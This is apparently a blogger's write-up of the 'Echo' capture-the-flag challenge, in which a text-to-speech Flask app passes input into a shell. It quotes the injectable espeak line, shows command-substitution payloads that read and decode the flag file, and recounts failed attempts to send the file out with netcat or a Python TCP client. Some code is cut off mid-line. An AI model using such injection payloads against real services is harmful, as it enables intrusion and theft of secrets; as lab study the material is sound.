Capture the Flag - Echo
If you hear enough, you may hear the whispers of a key...
If you see well enough, you will notice the UI sucks...
No hints.
PPP (plaid parliament of pwning) puts on one of the best online Jeopardy CTFs. I wish I had more time that weekend (runs for 48hrs only) and a full team, either way I decided to give it a shot.
Disclaimer, was not solved within the allotted time.
Alright, we have a flask app and the UI sucks. You enter some text:
and it spits back an audio file of the inputted text:
Taking a closer look at we see a few interesting things:
1. a container spawns and processes input tweets (140 chars max/tweet)
2. the flag is "encrypted" with a bitwise XOR
for x in flag:
c = 0
towrite = ''
for i in range(65000 - 1):
k = random.randint(0,127)
c = c ^ k
towrite += chr(k)
f.write(towrite + chr(c ^ ord(x)))
# To decrypt each flag char you need the last `c` and `c` starts life at 0.
# Each `k` is written to file **(this is important!)**
3. three items are mounted from host to the container: -v {path}:/share
host | container |
host_path/input | /share/input |
host_path/out/ | /share/out/ |
host_path/flag | /share/flag |
4. the docker container was readily available on dockerhub, with the interesting bit being This converts each tweet TTS (text-to-speech) and stores the corresponding .wav files at /share/out/
Examining a bit closer we have command substitution
available via l
. Awesome!
call(["sh","-c", "espeak " + " -w " + OUTPUT_PATH + str(i) + ".wav \"" + l + "\""])
So let's start asking the container questions. My preference is $(...)
instead of backticks. Why
is $(...) preferred over `` (backticks)?.
tweet_1: $(wc -c /share/flag) = 2470000 flag
Cool, the flag file is 2,470,000 bytes. We know a single flag char consumes 65,000 bytes (64,999 k values + 'encrypted' x). So the flag length will be 38.
Here is where I got stuck. I was so focused on getting /share/flag out of the container I overlooked a very important part of the challenge, there was no need to get the flag out. All the processing could be done on the container.
has all values of k, which enables solving for c before the last XOR.
Here is code that would 'decrypt' the flag:
with open ("/share/flag", "rb") as f:
while True:
b =
if not b:
for i in range(x-1):
c = c ^ ord(b[i])
print c ^ ord(b[x-1])
Each tweet is 140 characters max. Maybe there is a perl one liner? Most likely, but instead I wrote some python code into /tmp and ran it.
$(echo "with open (\"/share/flag\", \"rb\") as f:\n\tx=65000\n\twhile True:\n\t\tb =\n\t\tif not b:\n\t\t\tbreak" > /tmp/
$(echo "\t\tc=0\n\t\tfor i in range(x-1):\n\t\t\tc = c ^ ord(b[i])\n\t\tprint c ^ ord(b[x-1])" >> /tmp/
audio from tweet_3 (3.wav) gave us an ASCII int
>>> flag = [80, 67, 84, 70, 123, 76, 49, 53, 115, 116, 51, 110, 95, 84, 48, 95, 95, 114, 101, 101, 101, 95, 114, 101, 101, 101, 101, 101, 101, 95, 114, 101, 101, 101, 95, 108, 97, 125]
>>> "".join(chr(x) for x in flag)
Failed attempts
Tried getting the last 3 k values and x for each flag char and brute forcing all the possible combinations. This was not fruitful and didn't seem like the right approach. Cannot solve without having all the k values.
, tweet_2:cat /share/flag >> /share/out/1.wav
and then download 1.wav but this failed because ffmpeg could not recognize the file format and no .wav was generated in the first place. -
I tried to get /share/flag off the container.
apt-get install
rsync, netcat, etc, etc. But none of those worked. -
I tried to setup a python TCP client and send the /share/flag back to a listening port but that did not work. Wait a second,
, which means that container is lacking a network interface.